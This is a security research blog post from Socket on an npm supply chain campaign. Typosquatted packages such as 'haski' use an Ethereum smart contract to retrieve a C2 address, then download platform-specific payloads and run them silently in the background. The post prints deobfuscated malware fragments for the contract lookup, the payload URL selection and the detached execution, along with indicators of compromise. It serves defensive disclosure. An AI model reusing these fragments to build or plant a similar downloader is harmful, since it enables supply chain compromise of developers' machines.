Huge News!Announcing our $40M Series B led by Abstract Ventures.Learn More
Socket
Sign inDemoInstall
Socket

Security News

Research

Massive npm Malware Campaign Leverages Ethereum Smart Contracts To Evade Detection and Maintain Control

An advanced npm supply chain attack is leveraging Ethereum smart contracts for decentralized, persistent malware control, evading traditional defenses.

Massive npm Malware Campaign Leverages Ethereum Smart Contracts To Evade Detection and Maintain Control

Kush Pandya

Philipp Burckhardt

Kirill Boychenko

Orlando Barrera

October 31, 2024


Supply chain attacks are evolving. The Socket research team has uncovered a massive malware campaign that uses Ethereum smart contracts to control its operations — making it nearly impossible to shut down through traditional means. Instead of using conventional command and control servers that can be blocked or taken offline, these attackers are leveraging blockchain's decentralized architecture to maintain persistent control over their malware.

This technique represents a significant evolution in supply chain attacks targeting the npm ecosystem. In 2023, similar supply chain attacks impacted over 1.6 million downloads, and this new blockchain-based approach demonstrates how attackers continue to innovate their methodologies to evade detection and maintain persistence.

Technical Analysis#

Discovery and Initial Assessment

Our investigation began last week with the discovery of a suspicious package named "haski" (version 2.8.5) - a typosquat targeting husky, the popular git hooks library. This malicious package attempted to exploit husky's reputation by mimicking its name while containing obfuscated malicious code linked to an Ethereum wallet address.

The malicious code was designed to execute automatically upon installation through a postinstall script defined in the package's package.json file. The postinstall script is a lifecycle hook in npm that runs automatically after the package is installed. By leveraging this, the attackers ensure that their malicious code is executed without any additional action from the user.

This initial finding proved to be the tip of the iceberg.

Over the last twenty-four hours, our AI scanner detected a sudden wave of malware packages flooding the npm ecosystem, all exhibiting the same execution flow and identical blockchain-based characteristics. This onslaught suggests a carefully plotted attack, with the initial "haski" package potentially serving as a test run.

Further investigation revealed dozens of packages, all following a consistent pattern:

  • Legitimate-looking package names and descriptions
  • Similar obfuscation patterns using the _0x prefix
  • Identical code structure once deobfuscated
  • Common Ethereum contract interactions using the same wallet address found in the initial "haski" typosquat

Upon deobfuscation, we confirmed these packages were part of a coordinated campaign, each containing a sophisticated multi-stage malware downloader using Ethereum smart contracts for C2 communication. The attack infrastructure was consistent across all packages, using the same Ethereum contract address and wallet for C2 communication.

Each of the more than one hundred malware packages was published by a distinct, fake maintainer likely auto-generated through a tool like Faker. These profiles use randomized usernames and plausible email addresses with common names and random digits, such as upj4cimrds1fo with email address KarenCampbelljzm2902@gmail.com.

Some notable patterns across the discovered packages include:

  • Similar publication timestamps after the initial "haski" deployment, suggesting automated campaign expansion
  • Consistent code obfuscation techniques
  • Identical blockchain-based C2 mechanism
  • Uniform cross-platform payload delivery methods

This evolution from a targeted typosquat of a popular package to a broader automated campaign demonstrates the threat actors' shift toward more sophisticated and scalable attack methodologies.

Attack Architecture

The malware operates in three distinct stages:

Blockchain-Based C2 Retrieval

const contractAddress = '0xa1b40044EBc2794f207D45143Bd82a1B86156c6b';
const WalletOwner = '0x52221c293a21D8CA7AFD01Ac6bFAC7175D590A84';
const abi = ['function getString(address account) public view returns (string)'];

The malware queries a specific Ethereum contract to retrieve the payload URL, making traditional C2 blocking ineffective.

Through dynamic analysis of the contract interactions, we developed a script to query the malicious smart contract directly:

const { ethers } = require("ethers");

const provider = ethers.getDefaultProvider("mainnet");
const abi = ["function getString(address account) public view returns (string)"];
const contract = new ethers.Contract("0xa1b40044eBc2794f2707d45143Bd82a1B86156c6b", abi, provider);

async function getUrl() {
    try {
        const address = ethers.utils.getAddress("0x522212c293a21DBCA7AFD01aC6bFAC7175D590A84");
        const baseUrl = await contract.getString(address);
        console.log("Base URL:", baseUrl);
    } catch (error) {
        console.error("Error:", error);
    }
}

getUrl();

The contract query returned a C2 server address operating at http://45[.]125[.]67[.]172:1337. The use of a non-standard port (1337), combined with blockchain-based command retrieval, indicates a deliberate effort to evade standard detection mechanisms and to create a resilient and hard-to-disrupt C2 infrastructure:

Key findings from the C2 analysis:

  • Direct IP address usage instead of domain names
  • Non-standard port implementation
  • Contract-based address retrieval

Cross-Platform Payload Distribution

const getDownloadUrl = (baseUrl) => {
    const platform = os.platform();
    switch (platform) {
        case 'win32':
            return baseUrl + '/node-win.exe';
        case 'linux':
            return baseUrl + '/node-linux';
        case 'darwin':
            return baseUrl + '/node-macos';
    }
};

The code demonstrates a targeted platform detection and targeted payload delivery for Windows, Linux, and MacOS systems.

Stealthy Execution

const executeFileInBackground = async (filepath) => {
    const process = spawn(filepath, [], {
        detached: true,
        stdio: 'ignore'
    });
    process.unref();
};

The malware executes the downloaded payload with multiple stealth mechanisms:

  • Uses system temp directory for payload storage
  • Spawns detached processes
  • Implements error handling for persistence
  • Operates silently without user interaction

Crypto Address Workflow

The funding address 0x4E5B2e1dc63F6b91cb6Cd759936495434C7e972F appears to have a history of involvement in several crypto scams and controversial campaigns, including an incident where approximately $26 million was reportedly drained from BTC and ETH wallets and a portion deposited into this address.

The flow begins with the address (0x4E5B2...), which enables anonymous transactions, passing funds to an intermediary address (0x46b0f9bA...) for further separation. The funds then reach the primary wallet (0x52221c2...), the main operational hub that frequently interacts with a suspicious contract (0xa1b400...), using the Set String method to store or update data. This contract likely acts as a C2 node, allowing the attacker to maintain control over malware deployments securely and persistently through the blockchain. The transaction chain is carefully structured with low-value transactions to avoid detection, demonstrating a novel use of blockchain technology for decentralized and resilient C2 infrastructure.

Russian Language Used in the Malicious Code

During the analysis, the Socket Threat Research Team identified multiple instances of Russian language usage within the malicious packages codebase. The code contains error messages written in Russian, which are used in exception handling and logging.

console.error('Ошибка установки:', error);


Translation: “Installation error:”. This string is logged when an error occurs during the installation or execution of the downloaded file.

console.error('Ошибка при получении IP адреса:', error);

Translation: “Error retrieving IP address:”. This string is logged when there is an error while fetching data from the Ethereum smart contract.

The inclusion of Russian language elements in the malicious code suggests the attacker might be proficient in Russian, but this should be interpreted cautiously due to the possibility of deliberate misattribution or code reuse. Language usage is just one factor among many, and further analysis is necessary to conclusively determine the attacker's identity and origin.

Impact and Implications

This attack vector is particularly concerning for several reasons:

  • Resilient C2: Traditional domain blocking is ineffective against blockchain-based communication
  • Cross-Platform: Targets all major operating systems
  • Stealth: Intentional obfuscation and execution techniques
  • Persistence: Error handling ensures payload delivery by persistently retrying data from the blockchain

Protect your Supply Chain with Socket#

The discovery of this blockchain-based malware campaign demonstrates the evolving sophistication of supply chain attacks in the npm ecosystem. Threat actors are now leveraging smart contracts for command and control, making traditional security measures ineffective. This campaign, spanning multiple packages like "ethsg-util", "web3-toekn", and "ethblk-tracker", showcases how attackers can distribute advanced malware through seemingly legitimate packages.

Traditional code review and manual security checks are insufficient against these modern threats. The malware's use of blockchain for C2, intentional obfuscation, and cross-platform payload delivery demands a more robust, automated approach to package security. Socket's free GitHub app provides this crucial layer of protection by:

  • Identifying obfuscated malicious code patterns
  • Scanning install scripts for dangerous system operations
  • Alerting developers instantly via GitHub comments before malicious code enters your supply chain
  • Unauthorized network connections
  • Cross-platform payload downloads
  • System-level operations

Install Socket's free GitHub app today and get immediate protection against advanced supply chain attacks.

Conclusion#

This discovery marks a significant evolution in supply chain attacks, demonstrating how attackers are leveraging blockchain technology to create more resilient malware infrastructure. The combination of blockchain-based C2, cross-platform targeting, and stealth mechanisms makes this a threat that requires enhanced security measures.

To protect your organization from similar threats, consider implementing automated dependency scanning with Socket's GitHub integration. Our tools can help identify suspicious packages before they enter your supply chain, providing early warning against emerging threats like this blockchain-based attack vector.

Update 11/1:

This malware campaign is ongoing and we added more than 100 malicious packages to the IOCs. These include notable typosquats pretierr (typosquat for Prettier) and neextjs (targeting next).

Update 11/4:

Over the weekend, we have observed more malicious packages being published as part of this campaign, targeting a variety widely used legitimate npm packages such as nodemailer or axios.

IOCs (Indicators of Compromise)

Subscribe to our newsletter

Get notified when we publish new security blog posts!

Try it now

Ready to block malicious and vulnerable dependencies?

Install GitHub AppBook a demo

Related posts

Back to all posts
SocketSocket SOC 2 Logo

Product

Packages

npm

Stay in touch

Get open source security insights delivered straight into your inbox.


  • Terms
  • Privacy
  • Security

Made with ⚡️ by Socket Inc